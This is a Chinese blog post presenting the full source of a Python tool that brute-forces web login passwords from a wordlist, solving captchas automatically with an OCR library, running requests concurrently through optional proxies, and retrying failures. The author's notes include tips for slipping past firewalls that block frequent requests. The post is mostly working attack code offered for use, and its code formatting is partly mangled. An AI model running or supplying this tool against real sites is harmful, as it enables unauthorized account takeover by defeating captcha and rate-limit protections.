51工具盒子

依楼听风雨
笑看云卷云舒,淡观潮起潮落

验证码识别爆破python版-2.0最终版

吐槽: 一个验证码识别,已经发第三篇文章了,水文水的真严重 [aru_2]
作者:我也不想啊,今年都没发几篇文章,而且追求完美的我是真的感觉之前的脚本还存在问题拉~[aru_19]

镇图

验证码识别爆破python版-2.0最终版

验证码识别爆破python版-2.0最终版

说明

  1. 显而易见,进行了颜色显示美化。
  2. 对传参进行了优化,命令不像之前那么脓肿麻烦了,如:
    • 设置多个自定义请求头:-lh "xx:xx" -lh "aa:aa"
    • FORM 数据类型数据包传参:-d "username=bWTdXxa2Sm16K1bZ&code=mrwu_yzm&password=mrwu_pass&ggcode="
    • JSON 数据类型数据包传参:--data "{\"username\":\"bWTdXxa2Sm16K1bZ\",\"password\":\"mrwu_pass\",\"code\":\"mrwu_yzm\"}"
  3. 弃用多线程改为携程,感觉携程更加轻量快速一些。
  4. 对整个代码进行很大的重写和优化,之前版本的可能偶尔蹦出来些小BUG,这个版本应该么得那些问题了。
  5. 关于速度方面,已经尽力优化了,尝试了许多方法,感觉是因为第三方验证码识别库拉低了速度,暂时没想到好的方法....
  6. 如果遇到防火墙拦截频繁请求拉IP的目标,可以将线程改低,还是不行的话,可以将 210 行 前面的#注释符删除掉即可延迟规避防火墙。
  7. 注意:自定义请求头中不能加入Cookie 头,否则会验证码错误,脚本是在请求验证码的同时就已经将获取到的cookie给截取使用了,所以完全没必要在设置cookie。
  8. 141 行代码中的验证码三个字为 验证码错误的关键词后面是响应状态码,如果遇到哪怕验证码正确,响应包中也包含验证码这个关键词的话,可以自己找关键词替换进去,又或者直接注释掉这2行代码,否则可能会无限请求爆破。
  9. Python 版本最好是 3.7.0 以上,我自己的版本是3.10.0
  10. 支持无验证码的账号密码爆破,只需要不指定-cu 验证码地址即可,线程数最好别太大,否则容易挂掉或者被拉IP。
  11. 脚本加入了状态码非 200、301、302 则自动无限重试的功能。
  12. 任务是异步挂后台运行的,线程多和少最终执行速度取决于各方面因素,所以自己尝试找到最合适的线程数。
  13. 如果状态码显示-1 可能是请求失败或者请求不完整之类的,脚本会无限重试,如果状态码出现403、500、502之类的,那么就需要人工检查问题出在哪里了。
  14. 最后,使用脚本之前请先安装加载的第三方库:aiohttp,asyncio,argparse,ddddocr,imghdr,tqdm

代码-更新时间(2023 7/26 17.30)------ 【时常改动代码,请自行对比时间更新自己的代码】

import aiohttp,json,asyncio,argparse,ddddocr,imghdr,sys,datetime,urllib.parse
from tqdm import tqdm
def banner():
print('''
_       _

| | | |

___ __ _ _ __ | |_ | | __ _ __ _ ___
/ __/ | '_ \| __/ __| '_ \ / _ | / ` |/ _ \ | (| (| | |) | || (| | | | (| | | (| | () | __,| ./ || ||,| , |/ | | / |
|| |
/ Author:MrWu feedback:https://mrwu.red/fenxiang/4090.html

Update Time:2023 7/26 17.30 Tips : 1.验证码错误、无法访问、请求超时等失败的请求会自动重试!

2.可以通过 -x 排除不需要回显的状态码、响应结果关键词来让结果更加清晰,多个排除使用空格分割! 3.验证码和登录均支持自定义请求头,可以使用多个参数形式来添加多个请求头: -lh "xx:xx" -lh "aa:aa"! 4.如数据类型是JSON数据,使用反斜杠转义双引号:--data "{"username":"admin","password":"mrwu_pass","code":"mrwu_yzm"}" ''') #日志保存 def save(data): f = open('log.txt', 'a',encoding='utf-8') f.write(data + '\n') f.close() #命令行参数 def parse_arguments(argv): parser = argparse.ArgumentParser() `# 添加命令行参数 parser.add_argument('-lu', '--login_url', default='', required=True, help="登录提交地址", type=str) parser.add_argument('-cu', '--captcha_url', default='', help="验证码地址", type=str) parser.add_argument('-ch', '--captcha_header', action='append', default=['User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537'], help="验证码请求头") parser.add_argument('-lh', '--login_header', action='append', default=['User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537'], help="登录请求头,必须带上数据类型(application/json 或 application/x-www-form-urlencoded)。") parser.add_argument('-d', '--data', default='', required=True, help="1.登录提交的数据包,mrwu_pass 替换密码值,mrwu_yzm 替换验证码值。 2.如果是JSON数据类型,请给双引号加上反斜杠转义符。", type=str) parser.add_argument('-f', '--file', default='', required=True, help="密码字典路径", type=str) parser.add_argument('-x', '--xxx', nargs='+', default=[], help="排除的响应包大小回显,多个空格分割") parser.add_argument('-t', '--thread', type=int, default=10, help="指定线程数") parser.add_argument('-p', '--proxy', type=str, default='', help="代理格式: 协议:IP:端口 如:socks5://127.0.0.1:1080")

解析命令行参数

args = parser.parse_args(argv)

处理 captcha_header

captcha_headers = {} if args.captcha_header: for header in args.captcha_header: key, value = header.split(':') captcha_headers[key.strip()] = value.strip()

处理 login_header

login_headers = {} if args.login_header: for header in args.login_header: key, value = header.split(':') login_headers[key.strip()] = value.strip()

返回解析结果

return args.login_url, args.captcha_url, captcha_headers, login_headers, args.data, args.file, args.xxx, args.thread, args.proxy ` #字典 def open_data(txt): data_list = [] try: with open(txt, 'r', encoding='utf-8') as f: for line in f: try:

处理每一行的内容

data_list.append(line.replace("\n", "")) except Exception: tqdm.write(f"\033[94m[{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] \033[91m[ERROR] 读取文件异常,进行重试...\033[0m") data_list = open_data(txt) # 递归调用 open_data() 函数进行重试 break return data_list except FileNotFoundError: exit(f"\033[94m[{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] \033[91m[ERROR] 加载字典失败,请检查路径是否有误!\033[0m") async def _ocr(img): try: if imghdr.what(None, img) is not None: ocr = ddddocr.DdddOcr(show_ad=False) res = await asyncio.to_thread(ocr.classification, img) return res except Exception as e: exit(f"\033[94m[{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] \033[91m[ERROR] 验证码识别发生错误:\033[0m {e}") async def captcha(params): headers = params['param3'] proxies = params['param5'] url = params['param2'] `try: async with aiohttp.ClientSession() as session: async with session.get(url, headers=headers, proxy=proxies, timeout=3, ssl=False) as response: captcha_text = await response.read() cookies = response.headers.getall('Set-Cookie')

		if cookies and captcha_text:
			return cookies, captcha_text
		else:
			return -1

except ConnectionResetError as e: tqdm.write(f"\033[94m[{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] \033[91m[ERROR] 发生了错误:{e},延迟 3 秒后重试... \033[0m") await asyncio.sleep(3) return -1 except Exception as e: return -1 async def login(data, cookie, params): url = params['param1'] proxies = params['param5'] headers = {"Cookie": "; ".join(cookie)}if params['param4']: headers.update(params['param4'])

try: async with aiohttp.ClientSession() as session: async with session.post(params['param1'], data=data, headers=headers, proxy=params['param5'], timeout=3, ssl=False) as response: login_text = await response.text() if login_text and response.status: return response.status, login_text else: return -1 except ConnectionResetError as e: tqdm.write(f"\033[94m[{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] \033[91m[ERROR] 发生了错误:{e},延迟 3 秒后重试... \033[0m") await asyncio.sleep(3) return -1 except Exception as e: return -1 def login_results(pwd,result): status_code, response_text = resultif "验证码" in str(response_text) or str(status_code) not in ['200', '301', '302']: return -1

res = [ele for ele in params['param7'] if (ele in str(response_text) or ele in str(status_code))]

if not res: if len(str(response_text)) <= 150: tqdm.write(f"\033[94m[{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] \033[92m[INFO] \033[96m状态码:\033[0m{str(status_code)} \033[96m密码:\033[0m{pwd} \033[96m结果:\033[0m{str(response_text)}")

else:
	tqdm.write(f"\033[94m[{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] \033[92m[INFO]  \033[96m状态码:\033[0m{str(status_code)}  \033[96m密码:\033[0m{pwd}  \033[96m结果:\033[0m 响应结果太大请查看log.txt文件!")
	save("密码:%s  结果:%s\r" % (pwd, str(response_text)))

return str(status_code) async def run(pwd, params): if params['param2']: #验证码请求 captcha_task = asyncio.create_task(captcha(params)) captcha_result = await captcha_task if captcha_result == -1: return -1

#验证码识别
img_task = asyncio.create_task(_ocr(captcha_result[1]))
img_result = await img_task

#登录请求 data = params['param6'].replace('mrwu_pass', urllib.parse.quote(pwd)).replace('mrwu_yzm', img_result) login_task = asyncio.create_task(login(data, captcha_result[0], params))

else: #登录请求 data = params['param6'].replace('mrwu_pass', urllib.parse.quote(pwd)) login_task = asyncio.create_task(login(data, '', params))

login_result = await login_task if login_result == -1: return -1

return login_results(pwd,login_result) async def execute_tasks(thread, task_list, params): pbar = tqdm(total=len(task_list), desc='\033[94m任务', mininterval=0.3, bar_format=' {l_bar}{bar}| [\033[0m\033[91m{n_fmt}\033[94m/\033[0m\033[91m{total_fmt}\033[0m\033[94m] , [\033[0m\033[91m{rate_fmt}\033[0m\033[94m] , [用时:\033[0m\033[91m{elapsed}\033[0m\033[94m] , [预估完成时间:\033[0m\033[91m{remaining}\033[0m\033[94m]{postfix}')async def process_task(pwd): while True: try: result = await run(pwd, params) pbar.set_postfix_str('[状态码:\033[0m\033[91m' + str(result) + '\033[0m\033[94m]\033[0m') if result != -1: break except Exception as e: break pbar.update(1)

async def run_tasks(): tasks = {process_task(pwd) for pwd in task_list[:thread]} while tasks: completed, tasks = await asyncio.wait(tasks, return_when=asyncio.FIRST_COMPLETED) for task in completed: await task

		if len(task_list) > thread:
			new_task = task_list.pop(thread)
			tasks.add(asyncio.create_task(process_task(new_task)))
#await asyncio.sleep(0.5)  # 添加延迟时间,如果需要则取消注释即可。

try: await run_tasks() finally: pbar.close() if name == "main": banner() cmd = parse_arguments(sys.argv[1:])# 传递参数构造 params = { 'param1': cmd[0], 'param2': cmd[1], 'param3': cmd[2], 'param4': cmd[3], 'param5': cmd[8], 'param6': cmd[4], 'param7': cmd[6] } passlist = open_data(cmd[5])

启动

loop = asyncio.get_event_loop() loop.run_until_complete(execute_tasks(cmd[7], passlist, params))

print(f"\033[94m[{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] \033[91m[OK] 全部任务已完成!\033[0m") `

赞(0)
未经允许不得转载:工具盒子 » 验证码识别爆破python版-2.0最终版